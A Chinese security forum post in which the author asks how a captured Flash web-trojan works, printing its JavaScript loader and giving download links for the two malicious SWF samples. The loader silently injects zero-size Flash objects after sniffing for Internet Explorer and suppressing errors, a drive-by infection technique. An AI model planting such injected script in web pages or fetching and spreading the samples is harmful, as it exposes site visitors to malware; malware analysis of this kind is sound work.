无意中得到一个FLASH网马样本，swf解密后只有ly20088.asp?不多的明码，没搞清楚这个网马是怎么实现的。查了下资料，有个牛人也分析过，是一种合法SWF套用非法的SWF文件，可是当时他手上没有样本，就没继续分析下去。请问各位有什么看法？
代码如下：
<script>
document.writeln("<script>function init(){window.status=\"\";}window.onload = init;");
document.writeln("window.onerror=function(){return true;}");
document.writeln("");
document.writeln("if(navigator.userAgent.toLowerCase().indexOf(\"msie\")>0)");
document.writeln("{");
document.writeln("document.write(\'<object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http:\/\/download.macromedia.com\/pub\/shockwave\/cabs\/flash\/swflash.cab#version=4,0,19,0\" width=\"0\" height=\"0\" align=\"middle\">\');");
document.writeln("document.write(\'<param name=\"allowScriptAccess\" value=\"sameDomain\"\/>\');");
document.writeln("document.write(\'<param name=\"movie\" value=\"ifff.swf\"\/>\');");
document.writeln("document.write(\'<param name=\"quality\" value=\"high\"\/>\');");
document.writeln("document.write(\'<param name=\"bgcolor\" value=\"#ffffff\"\/>\');");
document.writeln("document.write(\'<embed src=\"ifff.swf\"\/>\');");
document.writeln("document.write(\'<\/object>\');");
document.writeln("}");
document.writeln("else{document.write(\'<EMBED src=\"ffff.swf\" width=0 height=0>\');}");
document.writeln("<\/script>")
</script>
swf下载地址：http://usa.ccxtt.com/ifff.swf http://usa.ccxtt.com/ffff.swf

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课